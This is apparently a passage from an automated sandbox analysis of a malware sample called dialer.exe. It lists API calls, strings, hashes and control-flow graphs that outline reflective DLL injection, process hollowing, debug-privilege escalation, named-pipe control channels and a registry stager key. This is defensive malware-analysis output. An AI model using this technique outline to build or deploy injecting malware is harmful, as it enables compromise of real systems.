                                                              • Instruction Fuzzy Hash: 67E08661640B4490EF019F61EC4429833B0DB58B64B9891229D9C06311FB38D5E9C321
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction ID: ba3002130823c0fe9a4b0d3e5fc32b0b8af4c4ef075c642b2c03889fc6bce62f
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: B1E08C61A00B4890EF029F21E8802A873B0EB68B64B989122CA8C06311FB38D5E9C321
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 0c7fe6e54972cd04bdfc5696195942a5bceecb5b4f5d22cc4423dcb7b8964cf7
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: 2D11A025601B5485FA55DF6AA80C32AB3B1FBC9FC1F284128DE8D43766EF39C442C311
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: 7534aa5f6862bd6bb294603f2423bfa4a52c40d89ce4ea09ebafc7b2bbd29c72
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: C5E0397560160486EB058BA2D80834A37F1EB89F86F1480248A9D07391DF7DC499C761

                                                              Execution Graph

                                                              Execution Coverage: 48.4%
                                                              Dynamic/Decrypted Code Coverage: 0%
                                                              Signature Coverage: 0%
                                                              Total number of Nodes: 227
                                                              Total number of Limit Nodes: 23

                                                              Callgraph

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                              • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                              • API String ID: 4177739653-1130149537
                                                              • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                              • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                              • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                              • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 
80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                              • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                              • API String ID: 2561231171-3753927220
                                                              • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                              • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                              • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                              • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                              • String ID:
                                                              • API String ID: 4084875642-0
                                                              • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                              • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                              • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                              • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                              • String ID: .text$C:\Windows\System32\
                                                              • API String ID: 2721474350-832442975
                                                              • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                              • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                              • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                              • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                              • String ID: M$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2203880229-3489460547
                                                              • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                              • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                              • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                              • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                              • String ID: \\.\pipe\dialercontrol_redirect64
                                                              • API String ID: 2071455217-3440882674
                                                              • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                              • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                              • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                              • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                              • String ID:
                                                              • API String ID: 3197395349-0
                                                              • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                              • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                              • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                              • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 Sleep 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                              • String ID:
                                                              • API String ID: 3676546796-0
                                                              • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                              • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                              • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                              • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                              Control-flow Graph

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                              • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                              • OpenProcess.KERNEL32 ref: 0000000140001859
                                                              • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                              • CloseHandle.KERNEL32 ref: 0000000140001875
                                                              • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                              • String ID:
                                                              • API String ID: 1323846700-0
                                                              • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                              • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                              • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                              • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseHandleOpenWow64
                                                              • String ID:
                                                              • API String ID: 10462204-0
                                                              • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                              • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                              • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                              • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                              APIs
                                                                • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                              • ExitProcess.KERNEL32 ref: 0000000140002263
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                              • String ID:
                                                              • API String ID: 3836936051-0
                                                              • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                              • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                              • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                              • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                               Control-flow Graph

                                                               control_flow_graph for sub_140002560 (rendered graph not reproduced; the basic blocks that call APIs are listed). The entry block at 140002560 leads through a chain of small branch blocks with no API calls to one of the handlers below; every handler ends in the common exit block at 140002a74.
                                                               • 1400025cb: ReadFile, then call 1400018ac, then call 1400010c0 or call 140002a90
                                                               • 140002660: RegOpenKeyExW; RegDeleteValueW on one branch; then call 1400019c4, call 14000175c, call 140001000, call 1400017ec
                                                               • 1400026bd: ExitProcess
                                                               • 1400026c6: GetProcessHeap, HeapAlloc, K32EnumProcesses, then call 1400010c0
                                                               • 14000276c: call 14000217c, call 1400021a8, ExitProcess
                                                               • 14000279d: call 140001944, then ReadFile; 1400027e9: GetProcessHeap, HeapAlloc, ReadFile; per entry either 140002881: lstrlenW, GetProcessHeap, HeapAlloc, call 140002a90, GetProcessHeap, HeapFree, or 14000286f: call 140001c88 (the process-creation and memory-writing routine graphed next); 14000290b: GetProcessHeap, HeapFree
                                                               • 140002919: call 140001944, call 140001944, then 140002947: ShellExecuteW
                                                               • 140002974: call 14000175c
                                                               • 14000297e: ReadFile, then call 1400018ac; 1400029db: GetProcessHeap, HeapAlloc, call 1400014d8, on one branch call 1400016cc; 140002a49: GetProcessHeap; 140002a52: HeapFree
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmp
                                                               • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                              • String ID: SOFTWARE$dialerstager$open
                                                              • API String ID: 3276259517-3931493855
                                                              • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                              • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                              • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                              • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                               Control-flow Graph

                                                               control_flow_graph for sub_140001c88 (rendered graph not reproduced; basic blocks and edges listed).
                                                               Basic blocks (node: address range, API calls):
                                                               285: 140001c88-140001cb8 (entry)
                                                               286: 140001cbb-140001cc8 (loop head)
                                                               287: 140001e8c-140001e91
                                                               288: 140001cce-140001d25 CreateProcessW
                                                               289: 140001e88
                                                               290: 140001d2b-140001d5a VirtualAllocEx
                                                               291: 140001e97
                                                               292: 140001e5d-140001e60 (failure path)
                                                               293: 140001d60-140001d7b WriteProcessMemory
                                                               294: 140001e99-140001eb9 (return)
                                                               295: 140001e62-140001e76 OpenProcess
                                                               296: 140001e85
                                                               297: 140001d81-140001d87
                                                               298: 140001e78-140001e83 TerminateProcess
                                                               299: 140001dd2-140001def VirtualAlloc
                                                               300: 140001d89
                                                               301: 140001df1-140001e07 GetThreadContext
                                                               302: 140001d8c-140001dba WriteProcessMemory
                                                               303: 140001dc0-140001dcc
                                                               304: 140001e09-140001e2e WriteProcessMemory
                                                               305: 140001dce
                                                               306: 140001e30-140001e4c SetThreadContext
                                                               307: 140001e4e-140001e5b ResumeThread
                                                               308: 140001eba-140001ebf
                                                               Edges: 285->286, 286->287, 286->288, 287->286, 287->291, 288->289, 288->290, 289->287, 290->292, 290->293, 291->294, 292->295, 292->296, 293->292, 293->297, 295->289, 295->298, 296->289, 297->299, 297->300, 298->289, 299->292, 299->301, 300->302, 301->292, 301->304, 302->292, 302->303, 303->302, 303->305, 304->292, 304->306, 305->299, 306->292, 306->307, 307->292, 307->308, 308->294
